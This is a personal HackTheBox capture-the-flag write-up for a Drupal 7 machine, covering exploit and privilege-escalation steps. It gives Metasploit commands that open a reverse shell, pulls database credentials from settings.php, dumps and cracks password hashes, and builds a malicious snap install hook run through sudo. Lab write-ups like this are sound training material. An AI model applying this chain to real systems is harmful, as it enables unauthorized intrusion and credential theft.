### Port Scanning and General Enumeration (Nmap) My **allports (-p-)** scan showed 22 and 80 open. Not much.  Tons of disallows in **robots.txt**, but nothing super interesting. **Drupal** version number though. Is 7 vulnerable to anything? --- ### Access (searchsploit, metasploit, drupal) Let's check **searchsploit** for **Drupal 7**  Looks like there's a ruby module for metasploit 1. `msfconsole` 2. `search drupal 7`  3. `use 4` 4. `set lhost tun0` 5. `set rhosts MACHINEIP` Using 4 we get a shell as 'apache' but it's really bad. After some googling for locations, I found the **Drupal config file** located at `/var/www/html/sites/default/settings.php` Database creds in that file!  `mysql -u drupaluser -p` Can't get output from mysql, but it's working. 1. `use drupal;` 2. `select name, pass from users;`  Saved the hash and ran it through John  The cracked hash gave us the password for the **brucetherealadmin** account. SSH in and capture the user flag!  --- ### Privesc (sudo, snap, fpm, gtfobins) `sudo -l`  gtfobins for snap https://gtfobins.github.io/gtfobins/snap/ Follow the directions and use **fpm** to generate the file we need, however before you upload it, edit the `/meta/hooks/install` file. Mine just cats the flag, but you can use whatever command you want. ``` #!/bin/sh cat /root/root.txt; false ```  Root flag! --- Back to [[HackTheBox Index]] Tags: #htb #metasploit #johntheripper #hashcracking #snap Related: